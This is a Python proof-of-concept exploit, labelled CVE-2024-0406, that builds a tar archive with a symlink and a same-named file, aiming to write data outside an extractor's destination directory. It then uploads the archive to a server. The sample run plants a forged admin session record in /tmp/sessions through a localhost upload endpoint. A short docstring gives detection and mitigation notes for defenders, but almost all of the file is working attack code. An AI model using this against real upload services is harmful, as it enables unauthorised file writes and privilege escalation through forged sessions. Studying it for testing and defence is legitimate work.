import os
import tarfile
import io
import requests
from typing import Optional, Dict
class SymlinkArchiveExploit:
    """Proof-of-concept builder for a tar archive with a symlink/file name clash.

    The archive written by this class holds two members that share one name:
    first a symbolic link pointing at ``target_path``, then a regular file
    carrying ``payload_data``. Going by the parameter descriptions, the point
    is to exercise extractors that create the link and then write the second
    member through it, which places the data outside the extraction directory.

    Review notes for defenders:
      * Detection: a tar listing in which a name appears twice and the earlier
        entry is a link is the structural signature produced here; an
        absolute link target is a second indicator.
      * Mitigation: an extractor should resolve every link target against the
        destination directory and refuse to write through a path component
        that is already a symlink. Python's own ``tarfile`` extraction
        filters (``filter="data"``) reject links that are absolute or that
        point outside the destination.
    """

    def __init__(
        self,
        target_path: str,
        payload_data: str,
        symlink_name: str = "symlink_pyld",
        archive_name: str = "malicious.tar"
    ):
        """
        Store the settings used by the other methods; nothing is written yet.

        :param target_path: Path the symlink member points at
        :param payload_data: Text stored in the regular-file member
        :param symlink_name: Member name shared by the link and the file
        :param archive_name: Path of the tar file to create
        """
        self.archive_name = archive_name
        self.symlink_name = symlink_name
        self.payload_data = payload_data
        self.target_path = target_path

    def create_malicious_archive(self) -> bool:
        """
        Write the two-member tar archive to ``self.archive_name``.

        Any exception is caught, reported on stdout and turned into ``False``.

        :return: True if the archive was written, False otherwise
        """
        try:
            with tarfile.open(self.archive_name, "w") as archive:
                # Member 1: a symbolic link named symlink_name -> target_path.
                link_member = tarfile.TarInfo(name=self.symlink_name)
                link_member.type = tarfile.SYMTYPE
                link_member.linkname = self.target_path
                archive.addfile(link_member)

                # Member 2: a regular file reusing the link's name. The size
                # field is taken from the text length, as in the original.
                file_member = tarfile.TarInfo(name=self.symlink_name)
                file_member.size = len(self.payload_data)
                body = io.BytesIO(self.payload_data.encode('utf-8'))
                archive.addfile(file_member, body)
        except Exception as exc:
            print(f"Error creating archive: {str(exc)}")
            return False
        else:
            return True

    def upload_archive(
        self,
        upload_url: str,
        cookies: Optional[Dict] = None,
        headers: Optional[Dict] = None
    ) -> bool:
        """
        POST the archive as multipart form field ``archive``, then delete it.

        Only HTTP 200 counts as success. The request carries no timeout
        argument. The local archive is removed in ``finally``, so it is gone
        after this call whether or not the upload worked.

        :param upload_url: Full URL of the upload endpoint
        :param cookies: Optional cookies sent with the request
        :param headers: Optional extra request headers
        :return: True on HTTP 200, False on any other status or on an error
        """
        try:
            with open(self.archive_name, 'rb') as handle:
                multipart = {
                    'archive': (self.archive_name, handle, 'application/x-tar')
                }
                response = requests.post(
                    upload_url,
                    files=multipart,
                    cookies=cookies,
                    headers=headers
                )
                if response.status_code != 200:
                    print(f"Upload failed: {response.status_code} - {response.text}")
                    return False
                print("Upload successful")
                return True
        except Exception as exc:
            print(f"Upload error: {str(exc)}")
            return False
        finally:
            # Runs on every exit path, including the early returns above.
            self.cleanup()

    def cleanup(self) -> None:
        """Delete the generated archive if it is present on disk."""
        if not os.path.exists(self.archive_name):
            return
        os.remove(self.archive_name)
        print("Temporary files cleaned up")
if __name__ == "__main__":
    # Example usage with the page's sample values. The upload goes to a
    # localhost endpoint, and the User-Agent string labels the request with
    # CVE-2024-0406.
    demo = SymlinkArchiveExploit(
        # Directory the symlink member points at (/tmp/sessions in this example).
        target_path="/tmp/sessions/",
        # Content of the regular-file member; the sample is a JSON session
        # record with an admin role.
        payload_data='{"username":"attacker","id":1,"role":"admin"}',
        symlink_name="symlink_pyld",
        archive_name="malicious.tar"
    )

    built = demo.create_malicious_archive()
    if built:
        # Example upload configuration: session cookie if the endpoint
        # requires one, plus any headers the upload request needs.
        demo.upload_archive(
            upload_url="http://localhost:1337/user/upload",
            cookies={"session": "cookieValid"},
            headers={"User-Agent": "CVE-2024-0406 Client"}
        )